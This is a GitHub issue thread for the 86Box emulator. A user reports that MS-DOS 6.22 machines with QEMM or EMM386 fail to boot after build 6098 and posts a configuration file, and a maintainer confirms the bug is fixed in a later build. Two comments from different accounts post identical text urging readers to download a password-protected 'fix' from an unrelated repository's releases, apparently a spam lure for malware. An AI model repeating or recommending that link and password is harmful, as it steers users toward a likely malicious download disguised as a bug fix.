### ISSUE TITLE
A 80486 machine running QEMM or EMM386 extenders can't load MS-DOS after V4.2.1 build b6098

### ISSUE THREAD

**Issue by mrgoog** [86Box/86Box#4769]
### What happened?

A 486 machine with MS-DOS 6.22 and QEMM 8.0 reboots immediately after Quarterdeck Extender Manager is loaded (it's the last message shown).

The same machine with MS-DOS 6.22 and EMM386 hangs during boot without any message shown.

The same machine running a plain DOS (only HIMEM,SYS loaded) runs without errors,

I can confirm this behavior occurs in all versions after V4.2.1 build b6098, I tested them :^) ...

### Configuration file

```ini
[Machine]
machine = 4saw2
time_sync = local
cpu_family = idx4
cpu_speed = 100000000
cpu_multi = 3
cpu_use_dynarec = 0
fpu_type = internal
fpu_softfloat = 0
mem_size = 32768

[Video]
gfxcard = n9_9fx_531_pci
show_second_monitors = 0

[Input devices]
mouse_type = ps2

[Storage controllers]
hdc = ide_pci

[Floppy and CD-ROM drives]
fdd_01_type = 35_2hd
fdd_02_type = 525_2hd
cdrom_01_parameters = 1, atapi
cdrom_01_ide_channel = 0:1
cdrom_01_type = 86BOX_CD-ROM_1.00

[Adaptec AHA-154xB]
base = 0334
irq = 11
dma = 7
hostid = 7
bios_addr = D8000

[Sound]
sndcard = sb16
fm_driver = nuked

[WinBox]
window_fixed_res = 960x720

[General]
dpi_scale = 0
video_fullscreen_first = 0
confirm_exit = 0
vid_renderer = qt_opengl3
force_43 = 1
scale = 2

[Hard disks]
hdd_01_parameters = 63, 16, 511, 0, ide
hdd_01_fn = 486dx2-66.img
hdd_01_speed = 1997_5400rpm
hdd_01_ide_channel = 0:0

[3Dfx Voodoo Graphics]
type = 0
framebuffer_memory = 4
texture_memory = 4
bilinear = 1
dithersub = 1
dacfilter = 0
render_threads = 2
sli = 0
recompiler = 1

[S3 Vision868 PCI (Number 9 9FX 531)]
memory = 2
```

### Operating system

Windows 11

### CPU

Intel core i7 14700KF

### 86Box version

V4.2.1 builb 6098

### Build architecture

Windows - x64 (64-bit)

### Build type

- [ ] New recompiler
- [ ] Debug build

### Download source

Official website (Jenkins, GitHub)

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by OBattler** [comment]
Actually, this has been fixed already in build 6110. I just tested MS-DOS 6.22 + EMM386 on my end and it booted fine.

**Comment by mrgoog** [comment]
The last version I tried, before reporting the error, was 6106 from 28 august 06:21PM,... Sure enough, the last version at this time (b6122), is indeed working!
Thanks.
